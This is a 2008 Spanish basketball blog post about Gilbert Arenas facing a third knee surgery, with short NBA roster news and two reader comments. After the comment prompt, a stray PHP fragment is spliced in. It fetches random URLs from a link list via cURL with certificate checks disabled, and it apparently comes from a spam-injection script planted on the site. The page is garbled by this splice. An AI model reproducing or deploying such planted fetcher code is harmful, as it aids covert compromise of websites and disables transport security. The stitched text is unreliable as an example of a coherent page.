Gilbert Arenas se operará de nuevo

18 de September de 2008 por txusma

Malas noticias para el poseedor del blog más cañero de la NBA (con permiso de Rod Benson) y para los aficionados y la directiva de los Washington Wizards. Gilbert Arenas deberá operarse por tercera vez de su rodilla izquierda y estará de baja, por lo menos, hasta diciembre.

Ernie Grunfeld, GM de los Wizards, ya ha declarado tras la lesión del jugador al que renovó por 111 millones de dólares este verano, que es el momento de que varios jugadores den un paso adelante y con su rendimiento palíen la baja del teórico jugador franquicia. De nuevo Caron Butler y Antawn Jamison se ven en la tesitura de liderar al equipo y seguro que esperan hacerlo tan bien como la temporada pasada en que se clasificaron para los Playoffs con un récord de 43-39 que les permitió acabar quintos de la conferencia Este.

Pero no ha sido ésta la última noticia de los últimos días:

  • Los Cavaliers han renovado a Delonte West, Miami a Chris Quinn y los Thunder, al pívot Robert Swift.
  • Pat Garrity anunció el pasado 11 de septiembre su retirada
  • Kosta Perovic abandonará los GSW para jugar esta temporada en la liga ACB, concretamente en el Pamesa de Valencia.
Comenta

2 comentarios a esta entrada

  1. Dantley dice:
    #1

    Qué crack ¡¡¡ Me refiero obviamente a Rod Benson 🙂

    La verdad es que empieza a ser descorazonador lo de Arenas. Tres operaciones son muchas. Sería una pena que no volviera al nivel que tuvo hace dos temporadas, pero si en diciembre no vuelve, habrá que ponerse en lo peor.

    Para los Wizards, si se recuperara, no sería un problema enorme durante estos meses. En el este, debe bastar con Jamison y Butler más los secundarios para no perder la estela de los playoffs.

      Citar

  2. Javi dice:
    #2

    Mal asunto lo de Gilbert Arenas. Las lesiones de rodilla son extremadamente delicadas y casi nunca terminas de recuperarte del todo. Que se lo digan a Raul Lopez. Desde su lesión de rodilla, sigue siendo bueno pero ya no es el mismo. Ahora es un jugador, tan solo, de medio tiempo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>